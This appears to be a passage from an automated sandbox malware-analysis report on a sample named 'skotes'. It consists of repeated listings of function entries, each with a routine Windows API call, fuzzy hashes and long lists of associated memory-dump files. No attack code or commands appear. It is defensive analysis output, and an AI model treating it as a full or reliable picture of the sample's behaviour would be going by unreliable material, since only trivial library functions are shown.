Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cdac6bff1fedb7362133b6f9c94c8eae7b863cd7fb32465c1297ae535104cbd
Instruction ID: 4567b01c10a12b0f7c1b60bf86f925e81e71eddbe5adb5507031ef3e07596abf
Opcode Fuzzy Hash: 8cdac6bff1fedb7362133b6f9c94c8eae7b863cd7fb32465c1297ae535104cbd
Instruction Fuzzy Hash: B2217B725051057BEB207B69DC02B9F3729DF4533CF11531AF9202B2C1D7789E0586A4

Function 00437124 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON

Download Yara Rule

APIs

SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?,?,0043705B,?,?,00000000,00000000), ref: 00437166

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Time$LocalSpecificSystem
String ID:
API String ID: 2574697306-0
Opcode ID: 89c6b8ccdb04ea8ecd7b27706832a9e25fdb408e514feaf1b96348c4d703ff31
Instruction ID: 19a6f030c6df9aaf4e4637fb8487822172e58f90966969c3952f4cd592c1ed63
Opcode Fuzzy Hash: 89c6b8ccdb04ea8ecd7b27706832a9e25fdb408e514feaf1b96348c4d703ff31
Instruction Fuzzy Hash: AC111CB390410CABDF10DE95C985EDF77BCAB0D314F206267E551E2280EA74EA45CBA5

Function 0043AC53 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 0043AC8D

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: b179973e2016f215b0ef3759c58dae6fc3af94d4a8fe8fa67ffe374620a294ef
Instruction ID: a66abbd6648e96b8c426010f02d88ffd1877682ffd29169a79776235427ef3c3
Opcode Fuzzy Hash: b179973e2016f215b0ef3759c58dae6fc3af94d4a8fe8fa67ffe374620a294ef
Instruction Fuzzy Hash: 551118B1A0420AAFCB05DF59E94199B7BF4EF48304F04406AF805AB351D670DD21DB69

Function 0043B04B Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,F89C42A9,?,?,0041D3FC,F89C42A9,?,00417A8B,?,?,?,?,?,?,00407465,?), ref: 0043B07E

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: d3e579016960f99e7d79f40e1f5ad570ce8be35f6e5b82e7819322212163e863
Instruction ID: 3ea9c3d718554331966b1561a36c418539583e8fe2488c62c8fcceb8a8c22db2
Opcode Fuzzy Hash: d3e579016960f99e7d79f40e1f5ad570ce8be35f6e5b82e7819322212163e863
Instruction Fuzzy Hash: EAE0E53110121196E73432265C02B5FB668CB4D3A0F053213EFE4D2290EB58CC0081ED

Function 00441775 Relevance: 1.5, APIs: 1, Instructions: 16fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000000,?,00441B65,?,?,00000000,?,00441B65,00000000,0000000C), ref: 00441792

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2bdab7df154edbc40174bc7681c90f0d907995257a0f12bd62413648ffafda3b
Instruction ID: fb30c1003dabc339a01a1ae90b05ebef69cb58c95e46098828bedcd5354007ea
Opcode Fuzzy Hash: 2bdab7df154edbc40174bc7681c90f0d907995257a0f12bd62413648ffafda3b
Instruction Fuzzy Hash: 8AD0923214020DBBEF129E84DC02EDA3BAAFB48714F014100BE1C66120C772E831AB94

Function 00416C70 Relevance: 1.3, APIs: 1, Instructions: 40sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 00416CF5

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
